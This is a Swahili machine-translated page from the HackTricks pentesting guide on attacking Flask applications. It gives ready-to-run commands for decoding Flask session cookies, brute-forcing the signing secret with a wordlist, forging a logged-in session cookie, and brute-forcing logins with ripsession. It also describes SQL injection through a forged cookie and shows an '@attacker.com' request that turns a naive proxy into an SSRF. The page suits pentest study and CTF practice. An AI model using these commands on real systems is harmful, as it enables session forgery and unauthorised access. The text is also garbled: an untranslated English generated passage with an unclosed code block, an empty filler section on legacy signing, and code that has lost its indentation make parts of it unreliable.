hacktricks/network-services-pentesting/pentesting-web/flask.md

Flask

Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

• Ikiwa unataka kuona kampuni yako ikionekana kwenye HackTricks au kupakua HackTricks kwa muundo wa PDF Angalia MPANGO WA KUJIUNGA!
• Pata swag rasmi ya PEASS & HackTricks
• Gundua Familia ya PEASS, mkusanyiko wetu wa NFTs za kipekee
• Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @carlospolopm.
• Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye HackTricks na HackTricks Cloud repos za github.

Tumia Trickest kujenga na kuautomatisha mchakato wa kazi zinazotumia zana za jamii za kisasa zaidi.
Pata Ufikiaji Leo:

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

Labda ikiwa unacheza CTF, programu ya Flask itahusiana na SSTI.

Vidakuzi (Cookies)

Jina la kikao cha kidakuzi cha chaguo-msingi ni session.

Mchawi wa Dekoda

Dekoda ya kidakuzi ya Flask mtandaoni: https://www.kirsle.net/wizards/flask-session.cgi

Kwa Mkono

Pata sehemu ya kwanza ya kidakuzi hadi alama ya kwanza na ukadiri Base64>

echo "ImhlbGxvIg" | base64 -d

Kuki pia inasainiwa kwa kutumia nenosiri

Flask-Unsign

Zana ya mstari wa amri ya kupata, kubadilisha, kuvunja nguvu na kutengeneza kuki za kikao za programu ya Flask kwa kudhani funguo za siri.

{% embed url="https://pypi.org/project/flask-unsign/" %}

pip3 install flask-unsign

Tafsiri Cookie

To decode a Flask session cookie, you can use the `itsdangerous` library in Python. The session cookie is usually a base64-encoded string that contains information about the user's session.

Here is an example of how to decode a Flask session cookie:

```python
from itsdangerous import URLSafeTimedSerializer

def decode_cookie(cookie_value, secret_key):
    serializer = URLSafeTimedSerializer(secret_key)
    try:
        decoded_data = serializer.loads(cookie_value)
        return decoded_data
    except Exception as e:
        return str(e)

In the above code, the decode_cookie function takes two parameters: cookie_value and secret_key. The cookie_value parameter is the value of the session cookie that you want to decode, and the secret_key parameter is the secret key used to sign the cookie.

The URLSafeTimedSerializer class from the itsdangerous library is used to create a serializer object. The loads method of the serializer object is then used to decode the cookie value.

If the decoding is successful, the decoded data is returned. Otherwise, an exception is raised and the error message is returned as a string.

Remember that decoding a session cookie can be useful for analyzing the information stored in it, but it should not be used to modify or tamper with the session data.

flask-unsign --decode --cookie 'eyJsb2dnZWRfaW4iOmZhbHNlfQ.XDuWxQ.E2Pyb6x3w-NODuflHoGnZOEpbH8'

Kuvunja Kwa Nguvu

flask-unsign --wordlist /usr/share/wordlists/rockyou.txt --unsign --cookie '<cookie>' --no-literal-eval

Kusaini

flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME'

Kusaini kwa kutumia toleo la zamani (legacy)

Kusaini kwa kutumia toleo la zamani (legacy) ni njia ya kusaini data kwa kutumia toleo la zamani la itifaki au algorithm. Hii inaweza kuwa hatari kwa sababu toleo la zamani linaweza kuwa na udhaifu au mapungufu ambayo yanaweza kusababisha kuvuja kwa data au kushambuliwa na wadukuzi.

Kabla ya kusaini kwa kutumia toleo la zamani, ni muhimu kuelewa hatari zinazohusika na kufanya tathmini ya usalama. Ni bora kutumia toleo la sasa la itifaki au algorithm ili kuhakikisha usalama wa data yako.

Ikiwa unahitaji kusaini kwa kutumia toleo la zamani kwa sababu fulani, hakikisha kuwa unazingatia miongozo ya usalama na kuchukua hatua za ziada za kulinda data yako. Pia, fanya kazi na wataalamu wa usalama ili kuhakikisha kuwa mchakato wako wa kusaini unafanywa kwa usalama na kwa njia sahihi.

flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME' --legacy

RIPsession

Chombo cha amri kinachotumika kuvunja nguvu tovuti kwa kutumia vidakuzi vilivyoundwa na flask-unsign.

{% embed url="https://github.com/Tagvi/ripsession" %}

ripsession -u 10.10.11.100 -c "{'logged_in': True, 'username': 'changeMe'}" -s password123 -f "user doesn't exist" -w wordlist.txt

SQLi katika kuki ya kikao cha Flask na SQLmap

Mfano huu hutumia chaguo la sqlmap eval kwa kiotomatiki kusaini malipo ya sqlmap kwa kutumia siri inayojulikana.

Flask Proxy kwa SSRF

Katika nakala hii imeelezewa jinsi Flask inavyoruhusu ombi linaloanza na herufi "@":

GET @/ HTTP/1.1
Host: target.com
Connection: close

Katika mazingira yafuatayo:

from flask import Flask
from requests import get

app = Flask('__main__')
SITE_NAME = 'https://google.com/'

@app.route('/', defaults={'path': ''})
@app.route('/<path:path>')
def proxy(path):
return get(f'{SITE_NAME}{path}').content

app.run(host='0.0.0.0', port=8080)

Inaruhusu kuweka kitu kama "@attacker.com" ili kusababisha SSRF.

Tumia Trickest kujenga na kuautomatisha mchakato zinazotumia zana za jamii za juu zaidi duniani.
Pata Ufikiaji Leo:

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (HackTricks AWS Red Team Expert)!

Njia nyingine za kusaidia HackTricks:

• Ikiwa unataka kuona kampuni yako inatangazwa kwenye HackTricks au kupakua HackTricks kwa PDF Angalia MPANGO WA KUJIUNGA!
• Pata swag rasmi wa PEASS & HackTricks
• Gundua The PEASS Family, mkusanyiko wetu wa NFTs za kipekee
• Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @carlospolopm.
• Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye HackTricks na HackTricks Cloud repos za github.